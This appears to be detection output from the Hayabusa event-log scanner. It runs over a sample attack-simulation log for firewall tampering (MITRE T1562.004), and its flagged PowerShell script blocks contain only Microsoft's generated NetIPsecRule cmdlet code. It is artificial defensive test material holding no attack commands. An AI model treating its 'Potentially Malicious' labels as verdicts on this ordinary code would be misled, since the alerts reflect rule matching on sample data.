[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] 
${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( 